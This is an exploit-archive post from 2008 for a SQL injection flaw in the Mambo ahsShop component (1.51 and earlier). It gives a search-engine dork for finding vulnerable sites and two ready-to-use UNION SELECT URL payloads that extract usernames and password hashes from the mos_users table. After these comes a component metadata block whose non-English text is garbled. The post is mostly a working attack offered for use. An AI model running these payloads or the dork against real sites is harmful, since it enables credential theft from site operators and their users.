Mambo Component ahsShop <= 1.51 (vara) SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Mambo Component ahsShop <= 1.51 (vara) SQL Injection Vulnerability
# Published : 2008-04-01
# Author : S@BUN
# Previous Title : FaScript FaPhoto v1 (show.php id) SQL Injection Vulnerability
# Next Title : eggBlog 4.0 Password Retrieve Remote SQL Injection Exploit

##########################################
#
# Mambo Component com_ahsshop SQL Injection
#
##########################################
#
##AUTHOR : S@BUN
#
####HOME : http://www.milw0rm.com/author/1334
#
####BLOG : http://my.opera.com/SQL-Injection/blog/
#
####MAiL : hackturkiye.hackturkiye@gmail.com
#
###########################################
#
# DORK 1 : allinurl: "com_ahsshop"do=default
#
###########################################
EXPLOiT 1 :

index.php?option=com_ahsshop&do=default&vara=-99999/**/union/**/select/**/0,concat(username,0x3a,password),0x3a,3,4,0x3a,6,0x3a/**/from/**/mos_users/*

EXPLOiT 2 :

index.php?option=com_ahsshop&do=default&vara=-99999/**/union/**/select/**/concat(username,0x3a,password),1/**/from/**/mos_users/*


###########################################
------------------S@BUN-------------------#
###########################################
-----hackturkiye.hackturkiye@gmail.com----#
###########################################
--http://my.opera.com/SQL-Injection/blog/-#
###########################################

side note:
	<name>ahsshop</name>
	<creationDate>15.07.2004</creationDate>
	<author>Arn???r Hei???ar fyrir Netvistun ehf.</author>
	<copyright>Allur h???fundarr???ttur ???skilinn</copyright>
	<authorEmail>arnor@netvistun.is</authorEmail>

	<authorUrl>www.netvistun.is</authorUrl>
	<version>1.51</version>
	<description>Kerfi ???tla??? til a??? kynna v???rur og v???ruflokka eftir ver???um</description>

# www.Syue.com [2008-04-01]